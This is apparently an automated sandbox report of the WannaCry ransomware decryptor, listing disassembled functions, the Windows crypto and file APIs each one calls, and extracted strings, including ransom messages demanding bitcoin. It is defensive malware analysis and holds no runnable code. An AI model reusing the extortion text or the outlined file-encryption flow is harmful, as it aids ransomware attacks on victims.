    APIs
    • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
    • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
    • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
    • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
      • Part of subcall function 00406AE0: #540.MFC42(?,767AAD28), ref: 00406B03
      • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
      • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
      • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
      • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
      • Part of subcall function 00406AE0: #800.MFC42(?,?,767AAD28), ref: 00406B62
      • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
      • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
      • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
      • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
      • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
      • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,767AAD28), ref: 00406BC4
      • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
      • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404AF0, Relevance: 6.1, APIs: 4, Instructions: 51
    APIs
    • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
    • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
    • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B3B
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00404770, Relevance: 4.5, APIs: 3, Instructions: 24
    APIs
    • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
    • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
    • CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004046F0, Relevance: 1.5, APIs: 1, Instructions: 46
    APIs
      • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
    • CryptImportKey.ADVAPI32(?,00420794,00000494,00000000,00000000,?,?,00402031,?), ref: 00404727
      • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
      • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
      • Part of subcall function 004049B0: GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
      • Part of subcall function 004049B0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
      • Part of subcall function 004049B0: CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000000,?), ref: 00404A75
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404A85
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
      • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
      • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
      • Part of subcall function 00404770: CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004046B0, Relevance: 1.5, APIs: 1, Instructions: 26
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040DB80, Relevance: 1.5, APIs: 1, Instructions: 9
    APIs
    • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004090F0, Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454
    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00405230, Relevance: 49.8, APIs: 33, Instructions: 279
    APIs
    • #940.MFC42(?), ref: 0040527D
    • #4277.MFC42(?,00000001), ref: 004052A0
    • #923.MFC42(?,00000000,?), ref: 004052B8
    • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
    • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
    • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
    • #4129.MFC42(?,?), ref: 004052FC
    • #5710.MFC42 ref: 00405314
    • #922.MFC42(?,00000000,00000000), ref: 00405326
    • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
    • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
    • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
    • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
    • #940.MFC42(?), ref: 00405396
    • #5710.MFC42(?,?), ref: 004053B8
    • #4129.MFC42(?,?,?,?), ref: 004053D7
    • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
    • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
    • #4129.MFC42(?,?), ref: 00405443
    • #4277.MFC42(?,?,?,?), ref: 0040545B
    • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
    • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
    • #6778.MFC42(?,00000001), ref: 004054EA
    • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
    • #6778.MFC42(00000000,?), ref: 00405536
    • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004020A0, Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
    • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
    • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
    • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
    • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
    • CloseHandle.KERNEL32(00000000), ref: 00402234
    • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
    • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
    • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004022AB
    • WriteFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 004022C0
    • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 004022E5
    • SetEndOfFile.KERNEL32(00000000), ref: 004022E8
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040230F
      • Part of subcall function 00404AF0: EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
      • Part of subcall function 00404AF0: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
      • Part of subcall function 00404AF0: LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
      • Part of subcall function 00404AF0: LeaveCriticalSection.KERNEL32(00000014), ref: 00404B3B
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
    • ReadFile.KERNEL32(00000000,?,00100000,?,00000000), ref: 004023F3
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00402436
    • _local_unwind2.MSVCRT ref: 00402452
    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040248A
    • SetEndOfFile.KERNEL32(00000000), ref: 00402491
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 004024AD
    • CloseHandle.KERNEL32(00000000), ref: 004024BD
    • MoveFileW.KERNEL32(?,?), ref: 004024DA
    • _local_unwind2.MSVCRT ref: 00402511
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004086E0, Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324
    APIs
    • #470.MFC42 ref: 00408708
    • GetClientRect.USER32(?,?), ref: 0040871F
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
    • #6734.MFC42(?,?), ref: 00408746
    • #323.MFC42(?,?), ref: 0040874F
    • CreateCompatibleDC.GDI32(?), ref: 004087D2
    • #1640.MFC42(00000000), ref: 004087DD
      • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
      • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
    • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
    • FillRect.USER32(?,?,?), ref: 0040887D
    • #2754.MFC42(?,?), ref: 00408892
    • #2381.MFC42(?,?,?), ref: 0040889F
    • #3797.MFC42(?,?,?), ref: 004088C0
    • _ftol.MSVCRT ref: 00408951
    • _ftol.MSVCRT ref: 0040896F
    • FillRect.USER32(?,00000000,00000000), ref: 004089B0
    • FillRect.USER32(?,00000000,?), ref: 004089C2
      • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
      • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
    • #755.MFC42(?,?,?), ref: 00408B20
      • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
    • #5785.MFC42(?,00000000,?,?,?,?,?,?,?,00CC0020,?,?,?), ref: 00408ACE
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,00CC0020,?,?,?), ref: 00408ADE
      • Part of subcall function 00409E20: #2414.MFC42(?,\gA,?,00414238,000000FF,00408AFE,?,?,?), ref: 00409E4B
    • #640.MFC42(?,?,?), ref: 00408B09
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00402AF0, Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133
    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00401760, Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140
    APIs
    • #6453.MFC42 ref: 00401780
    • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
    • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
    • CloseHandle.KERNEL32(?), ref: 004017B2
    • sprintf.MSVCRT ref: 00401811
    • fopen.MSVCRT ref: 00401821
    • fread.MSVCRT ref: 00401844
    • fclose.MSVCRT ref: 0040184D
    • DeleteFileA.KERNEL32(?), ref: 0040185B
    • #537.MFC42(You have a new message:), ref: 00401885
    • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
    • #1200.MFC42 ref: 004018AF
    • #800.MFC42 ref: 004018BF
    • #800.MFC42 ref: 004018D3
    • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
    • rand.MSVCRT ref: 00401903
    • #1200.MFC42(Congratulations! Your payment has been checked!Start decrypting now!,00000040,00000000), ref: 00401939
    Strings
    • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
    • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
    • %08X.dky, xrefs: 0040180A
    • You have a new message:, xrefs: 00401877
    • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004012E0, Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202
    APIs
    • sprintf.MSVCRT ref: 00401323
    • sprintf.MSVCRT ref: 00401339
    • GetFileAttributesA.KERNEL32(?), ref: 00401343
    • DeleteFileA.KERNEL32(?), ref: 0040139A
    • fopen.MSVCRT ref: 004013D5
    • fread.MSVCRT ref: 00401405
    • fclose.MSVCRT ref: 00401408
    • sprintf.MSVCRT ref: 00401440
    • fopen.MSVCRT ref: 00401453
    • fread.MSVCRT ref: 00401481
    • fclose.MSVCRT ref: 00401484
    • sprintf.MSVCRT ref: 004014C1
    • fopen.MSVCRT ref: 004014D4
    • fread.MSVCRT ref: 00401502
    • fclose.MSVCRT ref: 00401507
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
      • Part of subcall function 0040C240: fopen.MSVCRT ref: 0040C46B
      • Part of subcall function 0040C240: fwrite.MSVCRT ref: 0040C489
      • Part of subcall function 0040C240: fclose.MSVCRT ref: 0040C48F
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
      • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
      • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
      • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
      • Part of subcall function 004047C0: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
      • Part of subcall function 004047C0: strncmp.MSVCRT(00000000,?), ref: 00404951
      • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 00404964
      • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004076A0, Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239
    APIs
    • time.MSVCRT ref: 004076DA
    • sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
      • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
      • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
      • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
    • #540.MFC42 ref: 00407876
    • _ftol.MSVCRT ref: 004078AA
    • #2818.MFC42(?,$%d,00000000), ref: 004078BE
    • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
    • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
    • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
    • #3092.MFC42(00000402,?), ref: 0040791D
    • #6199.MFC42(00000402,?), ref: 00407924
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
    • #800.MFC42 ref: 0040799F
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004060E0, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139
    APIs
    • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
    • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
    • #567.MFC42(00000066,00000000), ref: 0040612F
    • #567.MFC42(00000066,00000000), ref: 00406147
      • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
      • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
      • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
      • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
      • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
      • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
      • Part of subcall function 004085C0: SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 0040864A
      • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
      • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
      • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
      • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
      • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
      • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
      • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
      • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
      • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
      • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
      • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
    • #567.MFC42(00000066,00000000), ref: 004061DF
    • #540.MFC42(00000066,00000000), ref: 004061F7
    • #540.MFC42(00000066,00000000), ref: 00406209
    • #540.MFC42(00000066,00000000), ref: 00406219
    • #540.MFC42(00000066,00000000), ref: 00406229
    • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
    • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
    • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
    • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
    • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
    • LoadIconA.USER32(00000000,00000080), ref: 0040632F
    • #860.MFC42(00421798), ref: 00406358
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00405E10, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
      • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
